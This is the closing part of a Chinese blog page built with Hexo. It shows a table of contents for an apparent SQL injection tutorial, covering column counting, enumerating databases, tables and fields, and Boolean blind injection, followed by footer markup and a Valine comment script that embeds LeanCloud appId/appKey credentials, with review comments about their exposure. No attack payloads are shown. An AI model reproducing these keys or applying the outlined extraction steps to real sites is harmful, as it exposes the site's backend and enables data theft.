class="toc-text">判断闭合符号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E5%AD%97%E6%AE%B5%E6%95%B0%E9%87%8F"><span class="toc-number">2.2.</span> <span 
class="toc-text">判断字段数量</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%95%B0%E6%8D%AE%E6%98%BE%E7%A4%BA%E4%BD%8D%E7%BD%AE"><span class="toc-number">2.3.</span> <span class="toc-text">判断数据显示位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E6%95%B0%E6%8D%AE%E5%BA%93%E5%BA%93%E5%90%8D"><span class="toc-number">2.4.</span> <span class="toc-text">查询数据库库名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E7%9A%84%E8%A1%A8"><span class="toc-number">2.5.</span> <span class="toc-text">枚举数据库中的所有的表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BE%E6%95%B0%E6%8D%AE%E8%A1%A8%E4%B8%AD%E6%89%80%E6%9C%89%E7%9A%84%E5%AD%97%E6%AE%B5"><span class="toc-number">2.6.</span> <span class="toc-text">枚举数据表中所有的字段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E5%AD%97%E6%AE%B5%E4%B8%AD%E6%89%80%E6%9C%89%E7%9A%84%E5%80%BC"><span class="toc-number">2.7.</span> <span class="toc-text">查询字段中所有的值</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Boolean%E7%9B%B2%E6%B3%A8"><span class="toc-number">3.</span> <span class="toc-text">Boolean盲注</span></a></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527518/0')"><div id="footer-wrap"><div class="copyright">©2020 - 2023 By BaiKer</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas 
fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"><script>function loadValine () {
// Mount the Valine comment widget into #vcomment.
// NOTE(review): appId/appKey are LeanCloud credentials delivered to every
// visitor. Valine needs them client-side, so this is not a leak as such, but
// anyone can call the LeanCloud REST API with them; the only real control is
// server-side (Web security domains and class-level ACLs on the comment class
// in the LeanCloud console) — confirm that is configured.
function initValine () {
  const options = {
    el: '#vcomment',
    appId: 'B4CWJLUwBNNEjD2SoNxuy03K-gzGzoHsz',
    appKey: '6vo75MB0241puEkTNHhBsuv9',
    avatar: 'monsterid',
    serverURLs: '',
    emojiMaps: "",
    path: window.location.pathname,
    visitor: false
  }
  // Object.assign(options, null) in the original is a no-op; pass directly.
  const valine = new Valine(options)
}
// Reuse an already-loaded Valine; otherwise fetch it from the CDN. The loader
// (getScript) sets no `integrity` attribute, so the bundle is not SRI-pinned.
if (typeof Valine === 'function') {
  initValine()
} else {
  getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}
}
if ('Valine' === 'Valine' || !false) {
if (false) btf.loadComment(document.getElementById('vcomment'),loadValine)
else setTimeout(loadValine, 0)
} else {
function loadOtherComment () {
loadValine()
}
}</script></div><link rel="stylesheet" href="https://baiker.top/css/custom.css"><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>